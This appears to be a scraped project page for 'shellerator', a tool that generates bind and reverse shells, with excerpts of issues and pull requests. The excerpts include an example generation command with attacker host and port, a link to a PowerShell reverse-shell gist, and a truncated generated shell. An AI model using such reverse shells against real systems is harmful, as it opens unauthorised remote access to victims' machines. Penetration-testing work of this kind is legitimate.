shellerator
shellerator copied to clipboard
Simple CLI tool for the generation of bind and reverse shells in multiple languages
Ctrl-c before:  Ctrl-c after: 
We could add an option like `--start-listener` for the `--reverse-shell` group that makes shellerator handle the listener and shell improvement parts. The idea comes from [this PR on Exegol](https://github.com/ShutdownRepo/Exegol/pull/31). PR...
Greetings, This PR aims to simplify the source code by putting all reverse shells in JSON files so it's easier to read the source code and it split the logic...
whould be interesting to add selection and encoding example: shellerator --reverse-shell --type powershell --lhost 10.10.16.155 --lport 1337 -select 1 -platform windows -encrypt base64 -select 1
Basically just imported this reverse shell: https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1 Demonstration using exegol:nightly that it works now. Attacker:  Victim: 
Both generated powershell reverse shells do not work: I used the following command to generate the reverse shells: ```bash # shellerator --type powershell --lport 443 --lhost 127.0.0.1 [1] powershell -NoP...